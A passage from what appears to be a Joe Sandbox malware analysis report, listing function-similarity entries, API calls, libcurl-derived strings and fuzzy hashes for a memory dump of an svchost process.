                                                                  • Part of subcall function 00000173D01AE340: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01AE387
                                                                  • Part of subcall function 00000173D01AE340: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01AE3A2
                                                                  • Part of subcall function 00000173D01AE340: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01AE3B0
                                                                  • Part of subcall function 00000173D01AE340: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01AE3C2
                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,HTTP,00000173D017E5CD,00000173D0153E76), ref: 00000173D01AE46C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$malloc
                                                                • String ID: HTTP$NTLM$SSPI: could not get auth info
                                                                • API String ID: 2190258309-1428047303
                                                                • Opcode ID: a707bc4b4b0493cab4ba14752b9b29a423daba1bd5b33d879bead69c4d2b8401
                                                                • Instruction ID: 8b12e2c79b40f9d9ed6cb3de8c9723e26dcda0f4a6a673466b49f31e70dbbef1
                                                                • Opcode Fuzzy Hash: a707bc4b4b0493cab4ba14752b9b29a423daba1bd5b33d879bead69c4d2b8401
                                                                • Instruction Fuzzy Hash: 4461483A208B8086EB708F55E48039AB7F5F788FC4F944425DA9D43B68EF38C655EB40
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: strstr
                                                                • String ID: bytes$Data conn was not available immediately$Getting file with size: %lld$Maxdownload = %lld$RETR response: %03d
                                                                • API String ID: 1392478783-1361617395
                                                                • Opcode ID: 7ed2df5fb296cb3b7918dc729f437e95104ca142180c5a307f7952e46ce5bb40
                                                                • Instruction ID: b9e94e55241006d06a6e06b84fce022b8809052a8fcf234e96eb8739f6863228
                                                                • Opcode Fuzzy Hash: 7ed2df5fb296cb3b7918dc729f437e95104ca142180c5a307f7952e46ce5bb40
                                                                • Instruction Fuzzy Hash: B751F87AE0868045FB7597A9EC053EDE2B0D385FE4FD80221DA7D066D6FB28C780A300
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: strchr$strstr
                                                                • String ID: %$%20$0123456789abcdef
                                                                • API String ID: 1654209344-876311552
                                                                • Opcode ID: 1961a64fb4a6ab28c183b2990609a5b1363807b83975f49ecd1153e7572903c5
                                                                • Instruction ID: 0168c73a927905c485cc3a17759afba4fb7ae88178947c9ccfa7f5d6996ee792
                                                                • Opcode Fuzzy Hash: 1961a64fb4a6ab28c183b2990609a5b1363807b83975f49ecd1153e7572903c5
                                                                • Instruction Fuzzy Hash: F841792970C28509FE3296A6D4203FAD6A1B708FE4FC84221DD7E57BC5F728CA47A304
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: memmovestrchr$calloc
                                                                • String ID:
                                                                • API String ID: 2412758169-0
                                                                • Opcode ID: 2fa393d124ef89bde96e505b8582a5e2ed7aa2abe3123bfcf398ad2d1efb8800
                                                                • Instruction ID: 54977c150f2e2ef69ad4837dc48bfe057aefc7007928a4c12294a2c902fa88a2
                                                                • Opcode Fuzzy Hash: 2fa393d124ef89bde96e505b8582a5e2ed7aa2abe3123bfcf398ad2d1efb8800
                                                                • Instruction Fuzzy Hash: 1681D47A20C69499FB75CAA5D1443E9EBF5A785FC4FE80111EAAD073C1F728C792A300
                                                                APIs
                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00000173D017EA60,?,?,?,?,?,?,00000000,?,?,00000173D0153E76), ref: 00000173D01796EC
                                                                • memmove.VCRUNTIME140(?,00000000,00000173D017EA60,?,?,?,?,?,?,00000000,?,?,00000173D0153E76), ref: 00000173D017970A
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00000173D017EA60,?,?,?,?,?,?,00000000,?,?,00000173D0153E76), ref: 00000173D017976B
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00000173D017EA60,?,?,?,?,?,?,00000000,?,?,00000173D0153E76), ref: 00000173D0179775
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00000173D017EA60,?,?,?,?,?,?,00000000,?,?,00000173D0153E76), ref: 00000173D017977F
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00000173D017EA60,?,?,?,?,?,?,00000000,?,?,00000173D0153E76), ref: 00000173D017979A
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$callocmemmove
                                                                • String ID:
                                                                • API String ID: 2309541529-0
                                                                • Opcode ID: 572deabb6b8290a8f7ffaca18cab45e40f293e6de7533773985693bb88463552
                                                                • Instruction ID: 33dda55792b15bb7e5c9f3cdd5c4e2db79a9b919446b8b5374ebdcf21d47b8c9
                                                                • Opcode Fuzzy Hash: 572deabb6b8290a8f7ffaca18cab45e40f293e6de7533773985693bb88463552
                                                                • Instruction Fuzzy Hash: EC312C39219A4082EA24DF96E85039DA3B4FBC8FD4F940125AEAD07B59FF38CA45D740
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: CriticalSectionfree$EnterLeaveclosesocket
                                                                • String ID:
                                                                • API String ID: 240345047-0
                                                                • Opcode ID: 4cea47bae9313296a911b173c89c3e3574eeee76c9b46606255648ab9b2db02e
                                                                • Instruction ID: 036d07b99b9f782c383d9fdb94962993671756cf00cf5379283cc7971ff5716a
                                                                • Opcode Fuzzy Hash: 4cea47bae9313296a911b173c89c3e3574eeee76c9b46606255648ab9b2db02e
                                                                • Instruction Fuzzy Hash: 9B11293A208A0087E7249F92E58439EB3B0F78AFD0F840121DF6E07B54EF78D5A5A710
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: SimpleString::operator=
                                                                • String ID: %s: %s$Serial Number$Signature Algorithm
                                                                • API String ID: 356670603-1527603233
                                                                • Opcode ID: d39f760e66e6e89a809a7dbd22f4cd13c6f27c08643c5210298e3da13c489cfa
                                                                • Instruction ID: 1121c2dc2ec92d45a828d7e9614b9ee342409bd1d004a725790979f963897d7b
                                                                • Opcode Fuzzy Hash: d39f760e66e6e89a809a7dbd22f4cd13c6f27c08643c5210298e3da13c489cfa
                                                                • Instruction Fuzzy Hash: 94418A7A30878685EB329BE1D8503E9A7B1B756FC4FC40515AEAD5778AFB38C640E340
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastrecv
                                                                • String ID: Recv failure: %s$recv(len=%zu) -> %d, err=%d
                                                                • API String ID: 2514157807-2495832097
                                                                • Opcode ID: bed5f14da304bbb2045fd42038e80d1795d9aec1cf0dcfeb36a033d7ec83f45d
                                                                • Instruction ID: c863433f2ada0e6218f0e71fdd939a4224aad970e8de5f7617323a4ef2d6173e
                                                                • Opcode Fuzzy Hash: bed5f14da304bbb2045fd42038e80d1795d9aec1cf0dcfeb36a033d7ec83f45d
                                                                • Instruction Fuzzy Hash: A631D4762086808AE6359F96E8547E9F7B0B789FD4F844115AEAD0B795FB3CC281DB00
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$_strdup
                                                                • String ID: Last-Modified:$Location:
                                                                • API String ID: 2653869212-3815226001
                                                                • Opcode ID: fac2aac935aee08a2f2fa3627afe3cb91424137be28187364b23d06d483cc389
                                                                • Instruction ID: d2fb139582f1bb5de3822a70caac505d8b6d6a6652c8366d541edafe5c0d0f6a
                                                                • Opcode Fuzzy Hash: fac2aac935aee08a2f2fa3627afe3cb91424137be28187364b23d06d483cc389
                                                                • Instruction Fuzzy Hash: AE318F7924D780C5FB719BA5D4043E8A2B0D786FDAF8804358E2D4B6D5FB28CA80EB15
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: _strdup
                                                                • String ID: Connection died, retrying a fresh connect (retry count: %d)$Connection died, tried %d times before giving up$REFUSED_STREAM, retrying a fresh connect
                                                                • API String ID: 1169197092-4242497519
                                                                • Opcode ID: a1902d478be4f8422c5172883111271925af11bc5d3f7a20674d84e107390f10
                                                                • Instruction ID: 496ef429f503f49f5a27296896a997ac3d1dde4e1228464814b0cac56eb5d5ee
                                                                • Opcode Fuzzy Hash: a1902d478be4f8422c5172883111271925af11bc5d3f7a20674d84e107390f10
                                                                • Instruction Fuzzy Hash: 73318D3A6096D082F7668B99E4443D9B7B0F785FC8F884034EB6D0B795EB29C696D700
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: _time64
                                                                • String ID: Connection time-out$gfff$set timeouts for state %d; Total % lld, retry %d maxtry %d
                                                                • API String ID: 1670930206-2826722092
                                                                • Opcode ID: dbf2721e6b1ab55ce9c62074772d5bbaf42ee43c46be42273c0cc3afc3a17f35
                                                                • Instruction ID: 2562e53b827272c70aa227bd196cd2893ded4820d695cfd6c6c618fe9afd2267
                                                                • Opcode Fuzzy Hash: dbf2721e6b1ab55ce9c62074772d5bbaf42ee43c46be42273c0cc3afc3a17f35
                                                                • Instruction Fuzzy Hash: 5B21077972421586EB34CFAAE4017D9A7B0F358FC8F901412ED1D8B784F779C2529700
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: Versionmemmovezlib
                                                                • String ID: libcurl/8.10.1-DEV$zlib/%s
                                                                • API String ID: 374951376-477685120
                                                                • Opcode ID: dd9bd3c64a7a3ac15a3e76413409a0eea37169667ef86f096f87415fa1e49075
                                                                • Instruction ID: 10d988438a828e0881fb554fe2976b89091eb6d157b26c66ba1e2721aeaa15e6
                                                                • Opcode Fuzzy Hash: dd9bd3c64a7a3ac15a3e76413409a0eea37169667ef86f096f87415fa1e49075
                                                                • Instruction Fuzzy Hash: C4318E3A609B8485E7218F50E4403DAB7B4F389BD4FC45222DAAD23795EB38C606D740
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$calloc
                                                                • String ID:
                                                                • API String ID: 3095843317-0
                                                                • Opcode ID: aae62e64d7a478b159b68f52773ff21e0be0dfebdbbd68c2197941eca1024f41
                                                                • Instruction ID: f2e72f774b36b68939903b19cb1315fbcf4a5e15f12b52493230c1284dfbd9d9
                                                                • Opcode Fuzzy Hash: aae62e64d7a478b159b68f52773ff21e0be0dfebdbbd68c2197941eca1024f41
                                                                • Instruction Fuzzy Hash: 51216BB9208B1083FB648FA6F9543A9A2B5AB48FC4F840025DE6E47798FF3CC6459341
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: ba293342d94ffe3c8aeb5c9959f4e856eb7cec13775bd3ec34c091d467a898c7
                                                                • Instruction ID: 9e4baf3fd482cc4af6256903c516914dbf11d7d03cb2828e0405cd9a4e7998c6
                                                                • Opcode Fuzzy Hash: ba293342d94ffe3c8aeb5c9959f4e856eb7cec13775bd3ec34c091d467a898c7
                                                                • Instruction Fuzzy Hash: 9711D63A205B4082EB149F69E89026CB3B4FB89FD4F444115CE6E47724EF34C992D750
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 5b8da2930924676327b981dcf17569e15eac1f162896e2a0a93f538f370f3328
                                                                • Instruction ID: f0cb97ca960554ee4739eb376defdd9cb6181a872e621e640e3e557a5db61921
                                                                • Opcode Fuzzy Hash: 5b8da2930924676327b981dcf17569e15eac1f162896e2a0a93f538f370f3328
                                                                • Instruction Fuzzy Hash: 29E0523A219D1182EB649FA6EC9416CA370E78CFA5F4402218E3E46224FF28C996D660
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: memchr
                                                                • String ID: Invalid status line$RTSP/$Received HTTP/0.9 when not allowed
                                                                • API String ID: 3297308162-903287913
                                                                • Opcode ID: cbe728620d90e39a8cb8637eac0b06d9a3a889e952a1e181f7a61fe4b81597c9
                                                                • Instruction ID: 49e5669a0f40c58804dd2902bb66db10bbef3c00a39e5aa28aaef14d4e88bac7
                                                                • Opcode Fuzzy Hash: cbe728620d90e39a8cb8637eac0b06d9a3a889e952a1e181f7a61fe4b81597c9
                                                                • Instruction Fuzzy Hash: 7E51823960C68085FB35DAA2D8153ED96B0A7C6FC4FD440359E6E5B786FF38C64AA301
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$_time64memmove
                                                                • String ID:
                                                                • API String ID: 1971662853-0
                                                                • Opcode ID: f8389c08a02813519fde331f50694b02712b134fcce863080d228978a737b810
                                                                • Instruction ID: 7a0d1dfe300cd6020abda8d270144cd773835a579d1be41128ce90b337b5152d
                                                                • Opcode Fuzzy Hash: f8389c08a02813519fde331f50694b02712b134fcce863080d228978a737b810
                                                                • Instruction Fuzzy Hash: 9241D37920D68485FB319BA5D9443EDE6B0A785FE4FC806209E7D037C6FB78C646A700
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: memchr
                                                                • String ID: Got unexpected pop3-server response
                                                                • API String ID: 3297308162-2372289448
                                                                • Opcode ID: f9e41d15f7de78c7c7a9a09fb5e2e5eda402558c9c52b3c7b7a9e4399ca61276
                                                                • Instruction ID: 78328623b9b1248033fbc258c941b90d11de48933ad175ffdeeb319233562b8b
                                                                • Opcode Fuzzy Hash: f9e41d15f7de78c7c7a9a09fb5e2e5eda402558c9c52b3c7b7a9e4399ca61276
                                                                • Instruction Fuzzy Hash: 5921817930D68091FA799A91D4943E992F1B746FC0FC400259E2E4B795FF3DCB85A740
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$freemalloc
                                                                • String ID:
                                                                • API String ID: 2605342592-0
                                                                • Opcode ID: deae8b2ba28c56d303df31542f47040e42c3e4a46138e759e1aaf1c128e49a55
                                                                • Instruction ID: baa5c5efe34a54eb9d61605fb70dafa9697e0c33b33e96cfd16ec89c3bd7229d
                                                                • Opcode Fuzzy Hash: deae8b2ba28c56d303df31542f47040e42c3e4a46138e759e1aaf1c128e49a55
                                                                • Instruction Fuzzy Hash: DB11BF35709F8186E6208F96FC4415AB7B4F788FE0F984228DB6A47B90EF38C9409300
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                • String ID:
                                                                • API String ID: 2933794660-0
                                                                • Opcode ID: 29168334428bd3c89460ca0a44bc26e6ba7efa86438a5e6a027f7a53120f7b51
                                                                • Instruction ID: 1ebfab2b1df188c3ae729799becd748afe3de2855c0f5c721210cb168a89c6f7
                                                                • Opcode Fuzzy Hash: 29168334428bd3c89460ca0a44bc26e6ba7efa86438a5e6a027f7a53120f7b51
                                                                • Instruction Fuzzy Hash: 5B115E3A714F048AEB10DFA0E8543E973B4F71AB98F840E21DA7D46BA4EB78C254D340
                                                                APIs
                                                                  • Part of subcall function 00000173D01626D0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000173D0162847,?,?,?,00000173D0151F41), ref: 00000173D0162705
                                                                  • Part of subcall function 00000173D01626D0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000173D0162847,?,?,?,00000173D0151F41), ref: 00000173D0162718
                                                                  • Part of subcall function 00000173D01626D0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000173D0162847,?,?,?,00000173D0151F41), ref: 00000173D016273F
                                                                  • Part of subcall function 00000173D01626D0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000173D0162847,?,?,?,00000173D0151F41), ref: 00000173D016274C
                                                                • _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00000173D0151F41), ref: 00000173D0162865
                                                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000173D0151F41), ref: 00000173D0162870
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000173D0151F41), ref: 00000173D0162886
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000173D0151F41), ref: 00000173D0162894
                                                                Memory Dump Source
